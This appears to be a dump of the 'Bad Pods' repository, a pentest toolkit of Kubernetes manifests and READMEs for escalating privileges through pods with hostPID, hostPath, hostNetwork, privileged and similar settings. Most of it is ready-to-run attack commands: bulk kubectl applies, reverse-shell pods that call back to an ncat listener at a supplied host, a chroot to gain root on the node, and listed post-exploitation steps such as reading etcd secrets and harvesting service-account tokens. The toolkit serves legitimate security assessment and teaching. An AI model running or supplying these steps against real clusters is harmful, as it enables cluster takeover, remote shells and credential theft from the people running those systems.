├── .github └── images │ ├── Pod1.jpg │ ├── Pod2.jpg │ ├── Pod3.jpg │ ├── Pod4.jpg │ ├── Pod5.jpg │ ├── Pod6.jpg │ ├── Pod7.jpg │ ├── Pod8.jpg │ └── Title.jpg ├── LICENSE ├── README.md ├── manifests ├── everything-allowed │ ├── README.md │ ├── cronjob │ │ ├── everything-allowed-exec-cronjob.yaml │ │ └── everything-allowed-revshell-cronjob.yaml │ ├── deamonset │ │ ├── everything-allowed-exec-deamonset.yaml │ │ └── everything-allowed-revshell-deamonset.yaml │ ├── deployment │ │ ├── everything-allowed-exec-deployment.yaml │ │ └── everything-allowed-revshell-deployment.yaml │ ├── job │ │ ├── everything-allowed-exec-job.yaml │ │ └── everything-allowed-revshell-job.yaml │ ├── pod │ │ ├── everything-allowed-exec-pod.yaml │ │ └── everything-allowed-revshell-pod.yaml │ ├── replicaset │ │ ├── everything-allowed-exec-replicaset.yaml │ │ └── everything-allowed-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── everything-allowed-exec-replicationcontroller.yaml │ │ └── everything-allowed-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── everything-allowed-exec-statefulset.yaml │ │ └── everything-allowed-revshell-statefulset.yaml ├── hostipc │ ├── README.md │ ├── cronjob │ │ ├── hostipc-exec-cronjob.yaml │ │ └── hostipc-revshell-cronjob.yaml │ ├── deamonset │ │ ├── hostipc-exec-deamonset.yaml │ │ └── hostipc-revshell-deamonset.yaml │ ├── deployment │ │ ├── hostipc-exec-deployment.yaml │ │ └── hostipc-revshell-deployment.yaml │ ├── job │ │ ├── hostipc-exec-job.yaml │ │ └── hostipc-revshell-job.yaml │ ├── pod │ │ ├── hostipc-exec-pod.yaml │ │ └── hostipc-revshell-pod.yaml │ ├── replicaset │ │ ├── hostipc-exec-replicaset.yaml │ │ └── hostipc-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── hostipc-exec-replicationcontroller.yaml │ │ └── hostipc-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── hostipc-exec-statefulset.yaml │ │ └── hostipc-revshell-statefulset.yaml ├── hostnetwork │ ├── README.md │ ├── cronjob │ │ ├── hostnetwork-exec-cronjob.yaml │ │ └── hostnetwork-revshell-cronjob.yaml │ ├── deamonset │ │ ├── hostnetwork-exec-deamonset.yaml │ │ └── hostnetwork-revshell-deamonset.yaml │ ├── deployment │ │ ├── hostnetwork-exec-deployment.yaml │ │ └── hostnetwork-revshell-deployment.yaml │ ├── job │ │ ├── hostnetwork-exec-job.yaml │ │ └── hostnetwork-revshell-job.yaml │ ├── pod │ │ ├── hostnetwork-exec-pod.yaml │ │ └── hostnetwork-revshell-pod.yaml │ ├── replicaset │ │ ├── hostnetwork-exec-replicaset.yaml │ │ └── hostnetwork-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── hostnetwork-exec-replicationcontroller.yaml │ │ └── hostnetwork-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── hostnetwork-exec-statefulset.yaml │ │ └── hostnetwork-revshell-statefulset.yaml ├── hostpath │ ├── README.md │ ├── cronjob │ │ ├── hostpath-exec-cronjob.yaml │ │ └── hostpath-revshell-cronjob.yaml │ ├── deamonset │ │ ├── hostpath-exec-deamonset.yaml │ │ └── hostpath-revshell-deamonset.yaml │ ├── deployment │ │ ├── hostpath-exec-deployment.yaml │ │ └── hostpath-revshell-deployment.yaml │ ├── job │ │ ├── hostpath-exec-job.yaml │ │ └── hostpath-revshell-job.yaml │ ├── pod │ │ ├── hostpath-exec-pod.yaml │ │ └── hostpath-revshell-pod.yaml │ ├── replicaset │ │ ├── hostpath-exec-replicaset.yaml │ │ └── hostpath-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── hostpath-exec-replicationcontroller.yaml │ │ └── hostpath-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── hostpath-exec-statefulset.yaml │ │ └── hostpath-revshell-statefulset.yaml ├── 
hostpid │ ├── README.md │ ├── cronjob │ │ ├── hostpid-exec-cronjob.yaml │ │ └── hostpid-revshell-cronjob.yaml │ ├── deamonset │ │ ├── hostpid-exec-deamonset.yaml │ │ └── hostpid-revshell-deamonset.yaml │ ├── deployment │ │ ├── hostpid-exec-deployment.yaml │ │ └── hostpid-revshell-deployment.yaml │ ├── job │ │ ├── hostpid-exec-job.yaml │ │ └── hostpid-revshell-job.yaml │ ├── pod │ │ ├── hostpid-exec-pod.yaml │ │ └── hostpid-revshell-pod.yaml │ ├── replicaset │ │ ├── hostpid-exec-replicaset.yaml │ │ └── hostpid-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── hostpid-exec-replicationcontroller.yaml │ │ └── hostpid-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── hostpid-exec-statefulset.yaml │ │ └── hostpid-revshell-statefulset.yaml ├── nothing-allowed │ ├── README.md │ ├── cronjob │ │ ├── nothing-allowed-exec-cronjob.yaml │ │ └── nothing-allowed-revshell-cronjob.yaml │ ├── deamonset │ │ ├── nothing-allowed-exec-deamonset.yaml │ │ └── nothing-allowed-revshell-deamonset.yaml │ ├── deployment │ │ ├── nothing-allowed-exec-deployment.yaml │ │ └── nothing-allowed-revshell-deployment.yaml │ ├── job │ │ ├── nothing-allowed-exec-job.yaml │ │ └── nothing-allowed-revshell-job.yaml │ ├── pod │ │ ├── nothing-allowed-exec-pod.yaml │ │ └── nothing-allowed-revshell-pod.yaml │ ├── replicaset │ │ ├── nothing-allowed-exec-replicaset.yaml │ │ └── nothing-allowed-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── nothing-allowed-exec-replicationcontroller.yaml │ │ └── nothing-allowed-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── nothing-allowed-exec-statefulset.yaml │ │ └── nothing-allowed-revshell-statefulset.yaml ├── priv-and-hostpid │ ├── README.md │ ├── cronjob │ │ ├── priv-and-hostpid-exec-cronjob.yaml │ │ └── priv-and-hostpid-revshell-cronjob.yaml │ ├── deamonset │ │ ├── priv-and-hostpid-exec-deamonset.yaml │ │ └── priv-and-hostpid-revshell-deamonset.yaml │ ├── deployment │ │ ├── priv-and-hostpid-exec-deployment.yaml │ │ └── priv-and-hostpid-revshell-deployment.yaml │ ├── job │ │ ├── priv-and-hostpid-exec-job.yaml │ │ └── priv-and-hostpid-revshell-job.yaml │ ├── pod │ │ ├── priv-and-hostpid-exec-pod.yaml │ │ └── priv-and-hostpid-revshell-pod.yaml │ ├── replicaset │ │ ├── priv-and-hostpid-exec-replicaset.yaml │ │ └── priv-and-hostpid-revshell-replicaset.yaml │ ├── replicationcontroller │ │ ├── priv-and-hostpid-exec-replicationcontroller.yaml │ │ └── priv-and-hostpid-revshell-replicationcontroller.yaml │ └── statefulset │ │ ├── priv-and-hostpid-exec-statefulset.yaml │ │ └── priv-and-hostpid-revshell-statefulset.yaml └── priv │ ├── README.md │ ├── cronjob │ ├── priv-exec-cronjob.yaml │ └── priv-revshell-cronjob.yaml │ ├── deamonset │ ├── priv-exec-deamonset.yaml │ └── priv-revshell-deamonset.yaml │ ├── deployment │ ├── priv-exec-deployment.yaml │ └── priv-revshell-deployment.yaml │ ├── job │ ├── priv-exec-job.yaml │ └── priv-revshell-job.yaml │ ├── pod │ ├── priv-exec-pod.yaml │ └── priv-revshell-pod.yaml │ ├── replicaset │ ├── priv-exec-replicaset.yaml │ └── priv-revshell-replicaset.yaml │ ├── replicationcontroller │ ├── priv-exec-replicationcontroller.yaml │ └── priv-revshell-replicationcontroller.yaml │ └── statefulset │ ├── priv-exec-statefulset.yaml │ └── priv-revshell-statefulset.yaml └── scripts └── can-they.sh /.github/images/Pod1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod1.jpg 
-------------------------------------------------------------------------------- /.github/images/Pod2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod2.jpg -------------------------------------------------------------------------------- /.github/images/Pod3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod3.jpg -------------------------------------------------------------------------------- /.github/images/Pod4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod4.jpg -------------------------------------------------------------------------------- /.github/images/Pod5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod5.jpg -------------------------------------------------------------------------------- /.github/images/Pod6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod6.jpg -------------------------------------------------------------------------------- /.github/images/Pod7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod7.jpg -------------------------------------------------------------------------------- /.github/images/Pod8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Pod8.jpg -------------------------------------------------------------------------------- /.github/images/Title.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BishopFox/badPods/fadd08c13a72ea57768969caf26af7667632d656/.github/images/Title.jpg -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 sart-bf 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bad Pods 2 | 3 | ![](.github/images/Title.jpg) 4 | 5 | A collection of manifests that create pods with different elevated privileges. Quickly demonstrate the impact of allowing security-sensitive pod attributes like `hostNetwork`, `hostPID`, `hostPath`, `hostIPC`, and `privileged`. 6 | 7 | For additional background, see our blog post: [Bad Pods: Kubernetes Pod Privilege Escalation](https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation). 8 | 9 | ## Contents 10 | 11 | * [The Bad Pods line-up](#The-bad-pods-line-up) 12 | * [Prerequisites](#Prerequisites) 13 | * [Organization](#Organization) 14 | * [Usage](#Usage) 15 | * [High level approach](#High-level-approach) 16 | * [Usage examples](#Usage-examples) 17 | * [Create all eight Bad Pods from cloned local repo](#Create-all-eight-Bad-Pods-from-cloned-local-repo) 18 | * [Create all eight Bad Pods from GitHub](#Create-all-eight-Bad-Pods-from-Github) 19 | * [Create all eight reverse shell Bad Pods](#Create-all-eight-reverse-shell-Bad-Pods) 20 | * [Create all eight resource types using the everything-allowed pod](#Create-all-eight-resource-types-using-the-everything-allowed-pod) 21 | * [Create a cronjob with the hostNetwork pod](#Create-a-cronjob-with-the-hostNetwork-pod) 22 | * [Create a deployment with the priv-and-hostpid pod](#Create-a-deployment-with-the-priv-and-hostpid-pod) 23 | * [Create a reverse shell using the privileged pod](#Create-a-reverse-shell-using-the-privileged-pod) 24 | * [Acknowledgements](#Acknowledgements) 25 | * [References and further reading](#References-and-further-reading) 26 | 27 | ## The Bad Pods line-up 28 | Each link below provides detailed usage information and post-exploitation recommendations. 29 | 30 | * [Bad Pod #1: Everything allowed](manifests/everything-allowed/) 31 | * [Bad Pod #2: Privileged and hostPid](manifests/priv-and-hostpid/) 32 | * [Bad Pod #3: Privileged only](manifests/priv/) 33 | * [Bad Pod #4: hostPath only](manifests/hostpath/) 34 | * [Bad Pod #5: hostPid only](manifests/hostpid/) 35 | * [Bad Pod #6: hostNetwork only](manifests/hostnetwork/) 36 | * [Bad Pod #7: hostIPC only](manifests/hostipc/) 37 | * [Bad Pod #8: Nothing allowed](manifests/nothing-allowed/) 38 | 39 | For more general information about prerequisites, repository organization, and common usage patterns, see the sections below. 40 | # Prerequisites 41 | 1. Access to a cluster 42 | 1. RBAC permission to create one of the following resource types in at least one namespace: 43 | * CronJob, DaemonSet, Deployment, Job, Pod, ReplicaSet, ReplicationController, StatefulSet 44 | 1. RBAC permission to exec into pods, or a network policy that allows a reverse shell from a pod to reach your listener. 45 | 1. No pod security policy enforcement, or a policy that allows pods to be created with one or more security-sensitive attributes 46 | 47 | 48 | 49 | # Organization 50 | * 128 self-contained, ready-to-use manifests. Why so many? 51 | * 8 Bad Pods (hostpid, hostnetwork, everything-allowed, etc.) 
52 | * 8 resource types that can create pods (pod, deployment, replicaset, statefulset, etc.) 53 | * 2 ways to access the created pods (exec & reverse shell) 54 | 55 | ``` 56 | ├── manifests 57 | │   ├── everything-allowed 58 | │   │   ├── cronjob 59 | │   │   │   ├── everything-allowed-exec-cronjob.yaml 60 | │   │   │   └── everything-allowed-revshell-cronjob.yaml 61 | │   │   ├── daemonset 62 | │   │   │   ├── everything-allowed-exec-daemonset.yaml 63 | │   │   │   └── everything-allowed-revshell-daemonset.yaml 64 | │   │   ├── deployment 65 | │   │   │   ├── everything-allowed-exec-deployment.yaml 66 | │   │   │   └── everything-allowed-revshell-deployment.yaml 67 | │   │   ├── job 68 | │   │   │   ├── everything-allowed-exec-job.yaml 69 | │   │   │   └── everything-allowed-revshell-job.yaml 70 | │   │   ├── pod 71 | │   │   │   ├── everything-allowed-exec-pod.yaml 72 | │   │   │   └── everything-allowed-revshell-pod.yaml 73 | │   │   ├── replicaset 74 | │   │   │   ├── everything-allowed-exec-replicaset.yaml 75 | │   │   │   └── everything-allowed-revshell-replicaset.yaml 76 | │   │   ├── replicationcontroller 77 | │   │   │   ├── everything-allowed-exec-replicationcontroller.yaml 78 | │   │   │   └── everything-allowed-revshell-replicationcontroller.yaml 79 | │   │   └── statefulset 80 | │   │   ├── everything-allowed-exec-statefulset.yaml 81 | │   │   └── everything-allowed-revshell-statefulset.yaml 82 | │   ├── hostipc 83 | │   │   ├── cronjob 84 | │   │   │   ├── hostipc-exec-cronjob.yaml 85 | │   │   │   └── hostipc-revshell-cronjob.yaml 86 | │   │   ├── daemonset 87 | │   │   │   ├── hostipc-exec-daemonset.yaml 88 | │   │   │   └── hostipc-revshell-daemonset.yaml 89 | ...omitted for brevity... 90 | ``` 91 | 92 | ### There are eight ways to create a pod 93 | As [Eviatar Gerzi (@g3rzi)](https://twitter.com/g3rzi) points out in the post [Eight Ways to Create a Pod](https://www.cyberark.com/resources/threat-research-blog/eight-ways-to-create-a-pod), there are 8 different controllers that can create a pod, or a set of pods. You might not be authorized to create pods, but maybe you can create another resource type that will create one or more pods. For each badPod type, there are manifests that correspond to all eight resource types. 94 | 95 | But wait, it gets worse! In addition to the eight current Kubernetes controllers that can create pods, there are third-party controllers that can also create pods if they are applied to the cluster. Keep an eye out for them by reviewing the output of `kubectl api-resources`. 96 | 97 | ### Reverse shells 98 | Even when you can create pods, you won't always be able to exec into them. To help in those situations, a version of each manifest is included that uses [Rory McCune's (@raesene)](https://twitter.com/raesene) ncat Docker Hub image. Once created, the pod makes an encrypted callback to your listener. 99 | 100 | # Usage 101 | Each resource in the `manifests` directory targets a specific attribute or a combination of attributes that expose the cluster to risk when allowed. 102 | 103 | ## High level approach 104 | 105 | #### Option 1: Methodical approach 106 | 1. **Evaluate RBAC** - Determine which resource types you can create 107 | 1. **Evaluate Admission Policy** - Determine which of the Bad Pods you will be able to create 108 | 1. **Create Resources** - Based on what is allowed, combine the allowed Bad Pod type and resource type to create your resources 109 | 1. 
**Post Exploitation** - Evaluate post-exploitation steps outlined in the README for that type 110 | * [Everything allowed](manifests/everything-allowed/) 111 | * [Privileged and hostPid](manifests/priv-and-hostpid/) 112 | * [Privileged only](manifests/priv/) 113 | * [hostPath only](manifests/hostpath/) 114 | * [hostPid only](manifests/hostpid/) 115 | * [hostNetwork only](manifests/hostnetwork/) 116 | * [hostIPC only](manifests/hostipc/) 117 | * [Nothing allowed](manifests/nothing-allowed/) 118 | 119 | 120 | #### Option 2: Shotgun approach 121 | 1. **Create Resources** - Just start applying different manifests and see what works 122 | * [Create all eight Bad Pods from GitHub](#Create-all-eight-Bad-Pods-from-Github) 123 | * [Create all eight resource types using the everything-allowed pod](#create-all-eight-resource-types-using-the-everything-allowed-pod) 124 | 1. **Post Exploitation** - For any created pods, evaluate post-exploitation steps outlined in the README for that type 125 | * [Everything allowed](manifests/everything-allowed/) 126 | * [Privileged and hostPid](manifests/priv-and-hostpid/) 127 | * [Privileged only](manifests/priv/) 128 | * [hostPath only](manifests/hostpath/) 129 | * [hostPid only](manifests/hostpid/) 130 | * [hostNetwork only](manifests/hostnetwork/) 131 | * [hostIPC only](manifests/hostipc/) 132 | * [Nothing allowed](manifests/nothing-allowed/) 133 | 134 | ## Usage Examples 135 | 136 | * [Create all eight Bad Pods from cloned local repo](#Create-all-eight-Bad-Pods-from-cloned-local-repo) 137 | * [Create all eight Bad Pods from GitHub](#Create-all-eight-Bad-Pods-from-Github) 138 | * [Create all eight reverse shell Bad Pods](#Create-all-eight-reverse-shell-Bad-Pods) 139 | * [Create all eight resource types using the everything-allowed pod](#Create-all-eight-resource-types-using-the-everything-allowed-pod) 140 | * [Create a cronjob with the hostNetwork pod](#Create-a-cronjob-with-the-hostNetwork-pod) 141 | * [Create a deployment with the priv-and-hostpid pod](#Create-a-deployment-with-the-priv-and-hostpid-pod) 142 | * [Create a reverse shell using the privileged pod](#Create-a-reverse-shell-using-the-privileged-pod) 143 | 144 | 145 | ### Create all eight Bad Pods from cloned local repo 146 | ``` 147 | kubectl apply -f ./manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 148 | kubectl apply -f ./manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 149 | kubectl apply -f ./manifests/priv/pod/priv-exec-pod.yaml 150 | kubectl apply -f ./manifests/hostpath/pod/hostpath-exec-pod.yaml 151 | kubectl apply -f ./manifests/hostpid/pod/hostpid-exec-pod.yaml 152 | kubectl apply -f ./manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 153 | kubectl apply -f ./manifests/hostipc/pod/hostipc-exec-pod.yaml 154 | kubectl apply -f ./manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml 155 | ``` 156 | 157 | ### Create all eight Bad Pods from GitHub 158 | ``` 159 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 160 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 161 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml 162 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml 163 | kubectl apply -f 
https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml 164 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 165 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml 166 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml 167 | ``` 168 | 169 | ### Create all eight reverse shell Bad Pods 170 | To avoid having to edit each pod with your host and port, you can use environment variables and the `envsubst` command. Remember to spin up all of your listeners first! 171 | 172 | ``` 173 | HOST="10.0.0.1" PORT="3111" envsubst < ./manifests/everything-allowed/pod/everything-allowed-revshell-pod.yaml | kubectl apply -f - 174 | HOST="10.0.0.1" PORT="3112" envsubst < ./manifests/priv-and-hostpid/pod/priv-and-hostpid-revshell-pod.yaml | kubectl apply -f - 175 | HOST="10.0.0.1" PORT="3113" envsubst < ./manifests/priv/pod/priv-revshell-pod.yaml | kubectl apply -f - 176 | HOST="10.0.0.1" PORT="3114" envsubst < ./manifests/hostpath/pod/hostpath-revshell-pod.yaml | kubectl apply -f - 177 | HOST="10.0.0.1" PORT="3115" envsubst < ./manifests/hostpid/pod/hostpid-revshell-pod.yaml | kubectl apply -f - 178 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostnetwork/pod/hostnetwork-revshell-pod.yaml | kubectl apply -f - 179 | HOST="10.0.0.1" PORT="3117" envsubst < ./manifests/hostipc/pod/hostipc-revshell-pod.yaml | kubectl apply -f - 180 | HOST="10.0.0.1" PORT="3118" envsubst < ./manifests/nothing-allowed/pod/nothing-allowed-revshell-pod.yaml | kubectl apply -f - 181 | ``` 182 | ### Create a cronjob with the hostNetwork pod 183 | ``` 184 | kubectl apply -f manifests/hostnetwork/cronjob/hostnetwork-exec-cronjob.yaml 185 | ``` 186 | 187 | Find the created pod 188 | ``` 189 | kubectl get pods | grep cronjob 190 | 191 | NAME READY STATUS RESTARTS AGE 192 | hostnetwork-exec-cronjob-1607351160-gm2x4 1/1 Running 0 24s 193 | ``` 194 | 195 | Exec into pod 196 | ``` 197 | kubectl exec -it hostnetwork-exec-cronjob-1607351160-gm2x4 -- bash 198 | ``` 199 | 200 | ### Create a deployment with the priv-and-hostpid pod 201 | ``` 202 | kubectl apply -f manifests/priv-and-hostpid/deployment/priv-and-hostpid-exec-deployment.yaml 203 | ``` 204 | Find the created pod 205 | ``` 206 | kubectl get pods | grep deployment 207 | 208 | priv-and-hostpid-exec-deployment-65dbfbf947-qwpz9 1/1 Running 0 56s 209 | priv-and-hostpid-exec-deployment-65dbfbf947-tghqh 1/1 Running 0 56s 210 | ``` 211 | Exec into pod 212 | ``` 213 | kubectl exec -it priv-and-hostpid-exec-deployment-65dbfbf947-qwpz9 -- bash 214 | ``` 215 | 216 | ### Create all eight resource types using the everything-allowed pod 217 | ``` 218 | find manifests/everything-allowed/ -name "*-exec-*.yaml" -exec kubectl apply -f {} \; 219 | 220 | cronjob.batch/everything-allowed-exec-cronjob created 221 | daemonset.apps/everything-allowed-exec-daemonset created 222 | deployment.apps/everything-allowed-exec-deployment created 223 | job.batch/everything-allowed-exec-job created 224 | pod/everything-allowed-exec-pod created 225 | replicaset.apps/everything-allowed-exec-replicaset created 226 | replicationcontroller/everything-allowed-exec-replicationcontroller created 227 | service/everything-allowed-exec-statefulset-service created 228 | statefulset.apps/everything-allowed-exec-statefulset created 229 | ``` 230 | 231 | View all 
of the created pods 232 | ``` 233 | kubectl get pods 234 | 235 | NAME READY STATUS RESTARTS AGE 236 | everything-allowed-exec-daemonset-qbrdb 1/1 Running 0 52s 237 | everything-allowed-exec-deployment-6cd7685786-rp65h 1/1 Running 0 51s 238 | everything-allowed-exec-deployment-6cd7685786-m66bl 1/1 Running 0 51s 239 | everything-allowed-exec-job-fhsbt 1/1 Running 0 50s 240 | everything-allowed-exec-pod 1/1 Running 0 50s 241 | everything-allowed-exec-replicaset-tlp8v 1/1 Running 0 49s 242 | everything-allowed-exec-replicaset-6znbz 1/1 Running 0 49s 243 | everything-allowed-exec-replicationcontroller-z9k8n 1/1 Running 0 48s 244 | everything-allowed-exec-replicationcontroller-m4648 1/1 Running 0 48s 245 | everything-allowed-exec-statefulset-0 1/1 Running 0 47s 246 | everything-allowed-exec-statefulset-1 1/1 Running 0 42s 247 | ``` 248 | Delete all everything-allowed resources 249 | ``` 250 | find manifests/everything-allowed/ -name "*-exec-*.yaml" -exec kubectl delete -f {} \; 251 | ``` 252 | 253 | ### Create a reverse shell using the privileged pod 254 | Set up listener 255 | ``` 256 | ncat --ssl -vlp 3116 257 | ``` 258 | 259 | Create the pod from the local manifest without modifying it, using environment variables and envsubst 260 | ``` 261 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/priv/pod/priv-revshell-pod.yaml | kubectl apply -f - 262 | ``` 263 | Catch the shell 264 | ``` 265 | ncat --ssl -vlp 3116 266 | Ncat: Version 7.80 ( https://nmap.org/ncat ) 267 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 268 | Ncat: Listening on :::3116 269 | Ncat: Listening on 0.0.0.0:3116 270 | 271 | Connection received on 10.0.0.162 42035 272 | ``` 273 | 274 | # Contributing 275 | Pull requests and issues welcome. 276 | 277 | # Acknowledgements 278 | Thank you [Rory McCune](https://twitter.com/raesene), [Duffie Cooley](https://twitter.com/mauilion), [Brad Geesaman](https://twitter.com/bradgeesaman), [Tabitha Sable](https://twitter.com/tabbysable), [Ian Coldwater](https://twitter.com/IanColdwater), [Mark Manning](https://twitter.com/antitree), [Eviatar Gerzi](https://twitter.com/g3rzi), and [Madhu Akula](https://twitter.com/madhuakula) for publicly sharing so much knowledge about Kubernetes offensive security. 279 | 280 | # References and further reading 281 | Each Bad Pod has its own references and further reading section, but here are some more general resources that will help you ramp up your Kubernetes security assessment and penetration testing skills. 
282 | 283 | ## New kids on the block - 2020 284 | * [Container Security Site](https://www.container-security.site/) by @raesene 285 | * [CloudSecDocs - Container Security](https://cloudsecdocs.com/container_security/offensive/attacks/compromised_container/) by @lancinimarco 286 | * [Risk8s Business: Risk Analysis of Kubernetes Clusters](https://tldrsec.com/guides/kubernetes/) by @antitree 287 | * Compromising Kubernetes Cluster by Exploiting RBAC Permissions by @g3rzi - [Talk](https://www.youtube.com/watch?v=1LMo0CftVC4) / [Slides](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf) 288 | * Command and KubeCTL: Real-World Kubernetes Security for Pentesters by @antitree - [Talk](https://www.youtube.com/watch?v=cRbHILH4f0A) / [Blog](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) 289 | * Kubernetes Goat by @madhuakula - [Repo](https://github.com/madhuakula/kubernetes-goat) / [Guide](https://madhuakula.com/kubernetes-goat/) 290 | 291 | ## The classics, way back from 2019 292 | * [Secure Kubernetes - KubeCon NA 2019 CTF](https://securekubernetes.com/) by @tabbysable, @petermbenjamin, @jimmesta, and @BradGeesaman 293 | * [The Most Pointless Kubernetes Command Ever](https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/) by @raesene 294 | * The Path Less Traveled: Abusing Kubernetes Defaults by @IanColdwater and @mauilion - [Talk](https://www.youtube.com/watch?v=HmoVSmTIOxM) / [Repository](https://github.com/mauilion/blackhat-2019) 295 | * [Understanding Docker container escapes](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) by @disconnect3d_pl 296 | * [A Compendium of Container Escapes](https://www.youtube.com/watch?v=BQlqita2D2s) by @drraid and @0x7674 297 | * [Attacking Kubernetes through Kubelet](https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet/) 298 | 299 | -------------------------------------------------------------------------------- /manifests/everything-allowed/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #1: Everything allowed 2 | ![](../../.github/images/Pod1.jpg) 3 | 4 | The everything-allowed pod mounts the host’s filesystem into the pod and gives you access to all of the host's namespaces and capabilities. You then exec into your pod and chroot to the directory where you mounted the host’s filesystem. You now have root on the node running your pod. 
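Once you have that shell, it's worth quickly confirming that you really are root on the node and not just in the container. A short sketch, using the pod name from the pod manifest in this directory:

```bash
kubectl exec -it everything-allowed-exec-pod -- chroot /host bash

# Now inside the node's root filesystem:
id                          # uid=0(root) on the node
hostname                    # the node's hostname, not the pod's
ls /var/lib/kubelet/pods    # every pod scheduled on this node
```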
5 | 6 | ## Table of Contents 7 | - [Pod creation & access](#pod-creation--access) 8 | - [Exec pods](#exec-pods) 9 | - [Reverse shell pods](#reverse-shell-pods) 10 | - [Deleting resources](#deleting-resources) 11 | - [Post exploitation](#post-exploitation) 12 | - [Can you run your pod on a control-plane node?](#can-you-run-your-pod-on-a-control-plane-node) 13 | - [Read secrets from etcd](#read-secrets-from-etcd) 14 | - [Look for kubeconfigs in the host filesystem](#look-for-kubeconfigs-in-the-host-filesystem) 15 | - [Grab all tokens from all pods on the system](#grab-all-tokens-from-all-pods-on-the-system) 16 | - [Some other ideas](#some-other-ideas) 17 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 18 | - [Demonstrate impact](#demonstrate-impact) 19 | - [References and further reading:](#references-and-further-reading) 20 | 21 | # Pod creation & access 22 | 23 | ## Exec pods 24 | Create one or more of these resource types and exec into the pod. 25 | 26 | **Pod** 27 | ```bash 28 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 29 | kubectl exec -it everything-allowed-exec-pod -- chroot /host bash 30 | ``` 31 | **Job, CronJob, Deployment, 